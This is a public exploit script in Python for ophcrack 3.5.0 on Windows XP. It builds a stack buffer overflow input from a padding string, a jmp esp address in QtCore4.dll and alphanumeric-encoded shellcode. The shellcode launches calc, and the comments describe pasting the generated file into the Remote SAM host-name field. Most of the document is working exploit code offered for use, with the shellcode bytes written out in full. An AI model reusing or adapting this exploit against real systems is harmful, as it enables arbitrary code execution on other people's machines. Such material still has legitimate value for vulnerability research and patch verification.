# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF
# Date: 21.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage:  http://ophcrack.sourceforge.net/
# Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-#win32-installer-3.5.0.exe
# Version: 3.5.0
# Tested on: Windows XP SP3 Eng (32bits)

#!/usr/bin/python

#Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well)
#In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash.
#pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload.
#pwdump6_setup itself doesn't look to be exploitable outside of ophrack.
#Kudos to Hostess for pointing me to #http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html

shellcode = (
#windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x79\x78\x6c\x49\x57\x70"
"\x65\x50\x65\x50\x75\x30\x6e\x69\x7a\x45\x44\x71\x7a\x72\x75"
"\x34\x4e\x6b\x46\x32\x30\x30\x4e\x6b\x56\x32\x34\x4c\x4e\x6b"
"\x36\x32\x54\x54\x4e\x6b\x73\x42\x71\x38\x36\x6f\x48\x37\x32"
"\x6a\x36\x46\x75\x61\x69\x6f\x34\x71\x49\x50\x6e\x4c\x55\x6c"
"\x30\x61\x61\x6c\x45\x52\x44\x6c\x57\x50\x6f\x31\x78\x4f\x56"
"\x6d\x47\x71\x69\x57\x7a\x42\x6a\x50\x31\x42\x46\x37\x4e\x6b"
"\x71\x42\x66\x70\x6e\x6b\x43\x72\x35\x6c\x66\x61\x58\x50\x6e"
"\x6b\x37\x30\x54\x38\x6e\x65\x6f\x30\x31\x64\x53\x7a\x56\x61"
"\x4e\x30\x66\x30\x6e\x6b\x50\x48\x65\x48\x4e\x6b\x30\x58\x65"
"\x70\x46\x61\x7a\x73\x6a\x43\x35\x6c\x43\x79\x6e\x6b\x46\x54"
"\x6e\x6b\x75\x51\x7a\x76\x75\x61\x49\x6f\x66\x51\x6b\x70\x4c"
"\x6c\x49\x51\x68\x4f\x66\x6d\x77\x71\x48\x47\x44\x78\x6b\x50"
"\x62\x55\x7a\x54\x34\x43\x61\x6d\x4a\x58\x67\x4b\x53\x4d\x66"
"\x44\x71\x65\x49\x72\x72\x78\x6e\x6b\x73\x68\x44\x64\x53\x31"
"\x5a\x73\x43\x56\x6e\x6b\x54\x4c\x30\x4b\x4e\x6b\x73\x68\x35"
"\x4c\x56\x61\x4b\x63\x4c\x4b\x66\x64\x6c\x4b\x46\x61\x58\x50"
"\x4f\x79\x32\x64\x56\x44\x54\x64\x73\x6b\x63\x6b\x65\x31\x31"
"\x49\x72\x7a\x62\x71\x49\x6f\x69\x70\x62\x78\x31\x4f\x30\x5a"
"\x6c\x4b\x44\x52\x5a\x4b\x4b\x36\x51\x4d\x53\x5a\x67\x71\x6c"
"\x4d\x4b\x35\x78\x39\x75\x50\x35\x50\x45\x50\x42\x70\x30\x68"
"\x35\x61\x6e\x6b\x42\x4f\x4d\x57\x79\x6f\x69\x45\x4d\x6b\x6b"
"\x4e\x66\x6e\x54\x72\x59\x7a\x43\x58\x59\x36\x4d\x45\x6d\x6d"
"\x4f\x6d\x39\x6f\x5a\x75\x75\x6c\x34\x46\x73\x4c\x57\x7a\x6d"
"\x50\x4b\x4b\x49\x70\x61\x65\x44\x45\x4f\x4b\x61\x57\x74\x53"
"\x32\x52\x52\x4f\x31\x7a\x43\x30\x36\x33\x39\x6f\x49\x45\x50"
"\x63\x65\x31\x32\x4c\x63\x53\x43\x30\x41\x41")

#!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp  asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll]

jmp="\x36\x29\x2a\x6e"
buffer = "A"*497 + jmp + shellcode

print(buffer)

file = open('exploit.txt','w')
file.write(buffer)
file.close()